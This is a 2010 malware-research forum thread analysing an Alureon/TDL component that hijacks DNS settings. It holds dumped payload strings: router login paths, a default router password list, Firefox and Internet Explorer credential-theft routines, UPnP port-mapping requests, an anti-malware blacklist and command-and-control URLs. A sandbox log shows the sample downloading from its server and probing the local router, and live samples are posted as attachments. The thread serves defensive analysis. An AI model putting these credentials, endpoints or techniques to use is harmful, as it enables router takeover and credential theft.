Alureon DNS Hijacking bot (DNSChanger, Win32/Alureon.EC)

#3274 by EP_X0FF
Sun Oct 31, 2010 10:47 am

This sub component of Alureon family looks untrivial :) Seems to be this one what we were talking about long time ago here.
http://www.kernelmode.info/forum/viewto ... =19&p=2696

http://www.virustotal.com/file-scan/rep ... 1288521202

Drops itself as usual through spooler and then uses NtQueueApcThread based injection (ernel32.dll) + NtResumeThread splicing.

As payload - modifies the DHCP registry to point to a malicious DHCP server. Contains list of default passwords (e.g. administrator, router etc).

Run itself as job through Task Scheduler
551ffeb7.job hxxp://www.birungueta.blogspot.com Blog do Birungueta c:\documents and settings\UserName\application data\551ffeb7.exe

Trying to contact few malicious URL's (addresses hardcoded in binary).

Contains some sort of security tools blacklist.

mbam.exe spybotsd.exe combofix.exe superantispyware.exe mrt.exe

Unpacked payload dll internals

CONTENT-LENGTH:
------------------------
index.asp dlink/hwiz.html home.asp wizard.htm login.asp cgi/b/users/switchpopup/ http://%s/%s GET SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d 1406 %s\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d AppEvents\Schemes\Apps\Explorer\Navigating\.current SYSTEM\CurrentControlSet\Control\Class\{72631E54-78A4-11D0-BCF7-00AA00B7B32A}\ %s InfSection cmbatt_inst explorer.exe InstallDate SOFTWARE\Microsoft\Windows NT\CurrentVersion %c-%08X-%X%X%X%X %c-%08X-defaultx 10.0.0.10 about.blank default none %s;%d.%d;%s;%s;%s;%d;%s;%s;%d;%s;%s;%s http\shell\open\command version software\microsoft\internet explorer defaut: %s
ie: %s
nav()
timeout(10000)
java(;)
hxxp://93.174.90.26/bsfk.php die ENDOFBLOCK getgrab ok
advapi32.dll CredFree CredEnumerateA abe2869f-9b47-4cd9-a358-c22904dba7f7 %ws login.php login_fail.php login_auth.asp login_fail.asp login.html firstuse.lp login.lp h t t p : / / % S / % S %s\Software\Microsoft\Internet Explorer\IntelliForms\Storage%d Software\Microsoft\Internet Explorer\IntelliForms\Storage%d %s:%s pstorec.dll PStoreCreateInstance : S t r i n g D a t a Password;pass;password;root;router;admin;administrator;;0;0P3N;1234;12345;123456;a;a6a7wimax;adslnadam;adslroot;airlive;alice;atlantis;bewan;cableroot;cciadmin;conexant;ecom;
epicrouter;friend;hamlet;hayesadsl;highspeed;hsparouter;motorola;mysweex;password1;sitecom46;sky;smcadmin;stccpe_2007;telekom;telus;telus177;tmadmin;trendchip;ttnet;utstar;
vodafone;zoomadsl admin;;root;Admin;1234 CurrentVersion SOFTWARE\Mozilla\Mozilla Firefox 3.5 3.6 \Main %s\%s%s Install Directory mozcrt19.dll sqlite3.dll nspr4.dll plc4.dll
plds4.dll nssutil3.dll softokn3.dll nss3.dll %s\%s NSS_Init PK11_GetInternalKeySlot PK11_Authenticate NSSBase64_DecodeBuffer PK11SDR_Decrypt PK11_FreeSlot NSS_Shutdown
sqlite3_open sqlite3_close sqlite3_prepare_v2 sqlite3_step sqlite3_column_text \Mozilla\Firefox\Profiles\* signons.sqlite select * from moz_logins NetFriendContainer %X
LOCATION: // SERVER: urn:schemas-upnp-org:device:InternetGatewayDevice:1 urn:schemas-upnp-org:service:WANIPConnection:1
urn:schemas-upnp-org:service:WANPPPConnection:1 239.255.255.250 M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
ST: %s
MAN: "ssdp:discover"
MX: %d

manufacturer modelName modelNumber controlURL http http://%s:%d%s <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost><NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewExternalPort><NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewProtocol><NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewInternalPort><NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">%s</NewInternalClient><NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</NewEnabled><NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewPortMappingDescription><NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope> SOAPAction: "%s#GetSpecificPortMappingEntry" upnperror <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="%s"><NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost><NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewExternalPort><NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewProtocol><NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewInternalPort><NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">%s</NewInternalClient><NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</NewEnabled><NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewPortMappingDescription><NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope> SOAPAction: "%s#AddPortMapping" <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:GetExternalIPAddress xmlns:m="%s"></m:GetExternalIPAddress></SOAP-ENV:Body></SOAP-ENV:Envelope> SOAPAction: "%s#GetExternalIPAddress" NewExternalIPAddress POST Content-Type: application/x-www-form-urlencoded %s
%s Authorization: Basic %s http://microsoft.com/ ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ %s%s
SeTcbPrivilege %08x %X%X%X%X mbam.exe spybotsd.exe combofix.exe superantispyware.exe mrt.exe iexplore.exe firefox.exe safari.exe opera.exe svchost.exe netsvcs spoolsv.exe spooler \%s.dll <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
%s.manifest open .exe kernel32.dll ernel32.dll LoadLibraryExA T r i g g e r 1 G o o g l e DhcpNameServer NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%s %d.%d.%d.%d,%d.%d.%d.%d WSPStartup msafd mswsock //tag: //img: &q= %s%c%s=%s%s%s Set-Cookie: kw=%s http://google.com/ j.js http://%d.%d.%d.%d/%s?m=4&a=%d&i=%s&u=%s .google. search.yahoo. search.msn. search.live. altavista.com ask.com search.aol. saerch.aol. search.icq. alltheweb.com bing.com yandex.ru rambler.ru go.mail.ru sm.aport.ru /search? /custom? /ie? /url? search. /search results.asp /web/results? /web? /results.php? /yandsearch? /scripts/template.dll? / .youtube. .wikipedia. .yahoo. rds.yahoo. overture. .yimg.com wikimedia. amazon.com hotmail. .msn.com .live.com microsoft. altavista. atdmt.com wzus1.ask. /i/i.gif? opselect.com aolcdn aolsearch .aol. revsci.net atwola. digitalcity. .icq. o.aolcdn.com alltheweb. bing. .yandex. tns-counter. .rambler. .rl0.ru .begun. list.ru .mail.ru z5x.net imgsmail.ru .aport. yadro.ru .ag.ru <html><head><meta http-equiv="refresh" content="10;url=%s">
<script>window.status="%s";</script>
<script src="http://%s:%d/%s?m=3&a=%d&i=%s&u=%s"></script>
Connection: Close
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Content-Length: HTTP/1.1 200 OK
%s%d
%s <script>click="<html><body onLoad='document.main.submit()'>%s<form action='%s' name='main' method='post'";if(top.location==parent.location) click+="target='_parent'";document.write(click+"></body></html>");</script>
HTTP/1.0 307 Temporary Redirect
%s0
Location: %s
Content-Length: ETag: Cookie: kw= & GET results5.google. /url?sa=t&source=web Host: http://%s%s Referer: /favicon.ico dynvolume.com %s\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\ %s\Software\Policies\Microsoft\Windows\WindowsUpdate WUServer | WUStatusServer %d.%dX%s;%d;%d;%s http://%s/kx.php \%s.exe Global\%s %s%d \ernel32.dll UacDisableNotify software\microsoft\Security Center EnableLUA SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System defaultid NtResumeThread

Attachments

setu3p.rar

pass: malware
(45.17 KiB) Downloaded 75 times

Ring0 - the source of inspiration

Username

EP_X0FF

Rank

Global Moderator

Posts

4947

Joined

Sun Mar 07, 2010 5:35 am

Location

Russian Federation

Contact

Re: Rootkit TDL 3 (alias TDSS, Alureon)

#3276 by erikloman
Sun Oct 31, 2010 2:03 pm

EP_X0FF wrote:This sub component of Alureon family looks untrivial :) Seems to be this one what we were talking about long time ago here.
http://www.kernelmode.info/forum/viewto ... =19&p=2696

Besides changing DNS settings, is it capable of infecting home routers?

Erik Loman [HitmanPro]
SurfRight B.V. - www.surfright.com

Username

erikloman

Posts

70

Joined

Sun Mar 14, 2010 8:53 am

Re: Rootkit TDL 3 (alias TDSS, Alureon)

#3277 by EP_X0FF
Sun Oct 31, 2010 2:30 pm

Don't have a router at hand this time, so no 100% answer. But looking on code and strings inside payload I think answer will be - yes. It contains code/patterns for D-Link, Linksys routers admin pages and array of default passwords.

Password;pass;password;root;router;admin;administrator;;0;0P3N;1234;12345;123456;a;a6a7wimax;adslnadam;adslroot;airlive;
alice;atlantis;bewan;cableroot;cciadmin;conexant;ecom;epicrouter;friend;hamlet;hayesadsl;highspeed;hsparouter;motorola;mysweex;password1;
sitecom46;sky;smcadmin;stccpe_2007;telekom;telus;telus177;tmadmin;trendchip;ttnet;utstar;vodafone;zoomadsl admin;;root;Admin;1234

Ring0 - the source of inspiration

Username

EP_X0FF

Rank

Global Moderator

Posts

4947

Joined

Sun Mar 07, 2010 5:35 am

Location

Russian Federation

Contact

Re: Rootkit TDL 3 (alias TDSS, Alureon)

#3280 by EP_X0FF
Mon Nov 01, 2010 12:35 pm

More fresh sample.
Very good detection ratio.

http://www.virustotal.com/file-scan/rep ... 1288614729

Attachments

setup.rar

pass: malware
(45.79 KiB) Downloaded 79 times

Ring0 - the source of inspiration

Username

EP_X0FF

Rank

Global Moderator

Posts

4947

Joined

Sun Mar 07, 2010 5:35 am

Location

Russian Federation

Contact

Re: Rootkit TDL 3 (alias TDSS, Alureon)

#3880 by PX5
Wed Dec 08, 2010 3:48 pm

Not sure what I missed here but no files using tdlcheck. :(

Attachments

irfvjtg.zip

(27.52 KiB) Downloaded 53 times

Arrogance led me to my Ignorance

Username

PX5

Posts

144

Joined

Thu Apr 29, 2010 1:14 am

Re: Rootkit TDL 3 (alias TDSS, Alureon)

#3881 by EP_X0FF
Wed Dec 08, 2010 4:07 pm

This is TDL downloader. It does not contain actual rootkit inside, but it works like typical tdl dropper (all hot stuff such as exploit included).
Contains link to

mbreniont.com

InternetConnectA InternetCrackUrlA InternetReadFile HttpOpenRequestA HttpSendRequestAl InternetOpenA InternetCloseHandle

here is the payload

Attachments

I31793q79.rar

pass: malware
(45.78 KiB) Downloaded 52 times

Ring0 - the source of inspiration

Username

EP_X0FF

Rank

Global Moderator

Posts

4947

Joined

Sun Mar 07, 2010 5:35 am

Location

Russian Federation

Contact

Re: Rootkit TDL 3 (alias TDSS, Alureon)

#3882 by EP_X0FF
Wed Dec 08, 2010 4:23 pm

Payload is the new version of Alureon routers stuff. It is logical - all series updated their droppers :)

index.asp dlink/hwiz.html home.asp wizard.htm login.asp cgi/b/users/switchpopup/
Password;pass;password;root;router;admin;administrator;;0;0P3N;1234;12345;123456;a;a6a7wimax;adslnadam;adslroot;
airlive;alice;atlantis;bewan;cableroot;cciadmin;conexant;ecom;epicrouter;friend;hamlet;hayesadsl;highspeed;hsparouter;
motorola;mysweex;password1;sitecom46;sky;smcadmin;stccpe_2007;telekom;telus;telus177;tmadmin;trendchip;ttnet;utstar;
vodafone;zoomadsl admin;;root;Admin;1234

Ring0 - the source of inspiration

Username

EP_X0FF

Rank

Global Moderator

Posts

4947

Joined

Sun Mar 07, 2010 5:35 am

Location

Russian Federation

Contact

Re: Rootkit TDL 3 (alias TDSS, Alureon)

#3885 by Cr4sh
Wed Dec 08, 2010 7:09 pm

EP_X0FF wrote:Payload is the new version of Alureon routers stuff.

What exactly this stuff doing?

http://blog.cr4.sh/

Username

Cr4sh

Posts

77

Joined

Sun Mar 14, 2010 6:07 pm

Re: Rootkit TDL 3 (alias TDSS, Alureon)

#3887 by ConanTheLibrarian
Wed Dec 08, 2010 9:11 pm

Samples seem to affect vbox x64 and x86. Hangs on boot.

Username

ConanTheLibrarian

Posts

56

Joined

Mon Mar 15, 2010 1:12 am

Location

USA

Contact

Re: Rootkit TDL 3 (alias TDSS, Alureon)

#3888 by PX5
Wed Dec 08, 2010 9:13 pm

It does something like this....

Code: Select all

2010-12-08 10:33:10 explorer.exe [1552.1784]: CreateProcess( C:\WINDOWS\Temp\irfvjtg.exe ) [3092] 0 kernel32 shell32 user32 comctl32 explorer shlwapi ntdll 
2010-12-08 10:33:11 irfvjtg.exe [3092.3096]: Detected PE file -> C:\WINDOWS\System32\spool\PRTPROCS\W32X86\xuO31m9g.dll
2010-12-08 10:33:11 irfvjtg.exe [3092.3096]: NewPEFile( C:\WINDOWS\system32\spool\prtprocs\w32x86\xuO31m9g.dll ) [3092] 1 kernel32 irfvjtg 
2010-12-08 10:33:11 irfvjtg.exe [3092.3096]: CopyFile( C:\WINDOWS\System32\spool\PRTPROCS\W32X86\xuO31m9g.dll -> c:\gmpot\01CB96ED38934142_xuO31m9g_dll.PE ) 
2010-12-08 10:33:11 irfvjtg.exe [3092.3096]: CreateSection( C:\WINDOWS\System32\spool\PRTPROCS\W32X86\xuO31m9g.dll )
2010-12-08 10:33:11 Idle [1672.3100]: NDIS: 213.163.64.36:80 -> 192.168.2.4:1049 http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1 application/x-msdos-program 73728 <-- PE   1
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: Detected PE file -> C:\WINDOWS\TEMP\OCEIQ7.exe
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: NewPEFile( C:\WINDOWS\Temp\OCEIQ7.exe ) [1672] 2 kernel32 [unknown]  <- http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: CopyFile( C:\WINDOWS\TEMP\OCEIQ7.exe -> c:\gmpot\01CB96ED397CE7B6_OCEIQ7_exe.PE ) 
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: CreateSection( C:\WINDOWS\TEMP\OCEIQ7.exe )
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: CreateProcess( C:\WINDOWS\Temp\OCEIQ7.exe ) [3108] 0 kernel32 advapi32 [unknown] 
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: Detected PE file -> C:\Documents and Settings\Owner\Application Data\21d2f7f1.exe
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: NewPEFile( C:\Documents and Settings\Owner\Application Data\21d2f7f1.exe ) [3108] 3 kernel32 oceiq7  <- http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: CopyFile( C:\Documents and Settings\Owner\Application Data\21d2f7f1.exe -> c:\gmpot\01CB96ED398FFA86_21d2f7f1_exe.PE ) 
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: Detected PE file -> C:\WINDOWS\System32\spool\PRTPROCS\W32X86\aAAA3179.dll
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: NewPEFile( C:\WINDOWS\system32\spool\prtprocs\w32x86\aAAA3179.dll ) [3108] 4 kernel32 oceiq7  <- http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: CopyFile( C:\WINDOWS\System32\spool\PRTPROCS\W32X86\aAAA3179.dll -> c:\gmpot\01CB96ED39925CE0_aAAA3179_dll.PE ) 
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: CreateSection( C:\WINDOWS\System32\spool\PRTPROCS\W32X86\aAAA3179.dll )
2010-12-08 10:33:13 spoolsv.exe [1672.3116]: Detected PE file -> C:\WINDOWS\system32\ernel32.dll
2010-12-08 10:33:13 spoolsv.exe [1672.3116]: NewPEFile( C:\WINDOWS\system32\ernel32.dll ) [1672] 5 kernel32 [unknown]  <- http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1
2010-12-08 10:33:13 spoolsv.exe [1672.3116]: CopyFile( C:\WINDOWS\system32\ernel32.dll -> c:\gmpot\01CB96ED3A099274_ernel32_dll.PE ) 
2010-12-08 10:33:13 spoolsv.exe [1672.3116]: CreateSection( C:\WINDOWS\system32\ernel32.dll )
2010-12-08 10:33:13 Idle [1672.3124]: NDIS: 207.46.232.182:80 -> 192.168.2.4:1051 http://microsoft.com/ text/html 23   2
2010-12-08 10:33:13 spoolsv.exe [1672.3124]: SaveHttp( http://microsoft.com/ -> c:\gmpot\TEMP\01CB96ED3A49F1F2_microsoft_com )
2010-12-08 10:33:14 Idle [1672.3124]: NDIS: 65.55.12.249:80 -> 192.168.2.4:1052 http://www.microsoft.com/ text/html 1020   3
2010-12-08 10:33:14 spoolsv.exe [1672.3124]: SaveHttp( http://www.microsoft.com/ -> c:\gmpot\TEMP\01CB96ED3A6B52DE_www_microsoft_com )
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1058 http://192.168.2.1/index.asp  0   2
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1059 http://192.168.2.1/dlink/hwiz.html  0   3
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1060 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1061 http://192.168.2.1/  0   3
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1062 http://192.168.2.1/home.asp  0   4
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1063 http://192.168.2.1/wizard.htm  0   5
2010-12-08 10:34:02 gmpot.exe [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1064 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1065 http://192.168.2.1/login.asp  0   3
2010-12-08 10:34:02 gmpot.exe [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1066 http://192.168.2.1/cgi/b/users/switchpopup/  0   4
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1067 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1068 http://192.168.2.1/index.asp  0   3
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1069 http://192.168.2.1/dlink/hwiz.html  0   4
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1070 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1071 http://192.168.2.1/  0   3
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1072 http://192.168.2.1/home.asp  0   4
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1073 http://192.168.2.1/wizard.htm  0   5
2010-12-08 10:34:04 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1074 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:04 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1075 http://192.168.2.1/login.asp  0   3
2010-12-08 10:34:04 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1076 http://192.168.2.1/cgi/b/users/switchpopup/  0   4
2010-12-08 10:34:04 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1077 http://192.168.2.1/login.stm  0   2

Then makes job file pointing to this--> C:\Documents and Settings\Owner\Application Data\21d2f7f1.exe

Captured files attached.

Attachments

tdl12810.rar

(210.89 KiB) Downloaded 57 times

Arrogance led me to my Ignorance

Username

PX5

Posts

144

Joined

Thu Apr 29, 2010 1:14 am